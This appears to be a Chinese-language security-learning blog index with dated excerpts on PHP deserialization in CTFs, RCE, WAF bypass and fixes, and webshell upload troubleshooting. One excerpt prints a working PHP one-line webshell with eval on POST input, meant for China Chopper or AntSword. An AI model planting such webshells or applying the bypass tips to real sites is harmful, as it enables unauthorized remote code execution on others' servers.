摘要:
serialize() 函数用于序列化对象或数组,并返回一个字符串。 unserialize()反序列化,将字符串转化为对象。 通常见到调用外部文件,然后需要通过调用某个函数来执行最终得到flag。常见函数如下: 阅读全文
2023年8月4日
2023年7月30日
2023年7月26日
2023年7月25日
摘要:
rce漏洞:利用代码或者命令去执行 常见的一句话木马: 1、普通一句话: 1 2 3 <?php @eval($_POST[123456]); ?> *post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码 2、防爆破一句话: 1 2 3 4 <?php substr(md5($_REQUEST[ 阅读全文
2023年7月20日
2023年7月17日
2023年6月20日
摘要:
waf常见绕过方法 1.数据溢出-防止匹配(制造大量垃圾数据插入其中) 2.符号变异-防止匹配(一个“或者‘之内) 3.数据截断-防止匹配(%00;/n等符号) 4.重复数据-防止匹配(参数叠加参数) waf修复方案 1.后端验证:采用服务端验证模式 2.后缀检测:基于黑名单,白名单过滤 3.mim 阅读全文
2023年6月15日
摘要:
1.无法连接上自己的ip: 发现问题是上传的木马不在127.0.0.1的文件下时,会导致解析不到木马,要将木马上传到127.0.0.1的文件下连接 2.解决sql上传一句话木马问题 要先在mysql的配置文件my.ini中添加导入导出数据库的地址:secure_file_priv=D:\phpstu 阅读全文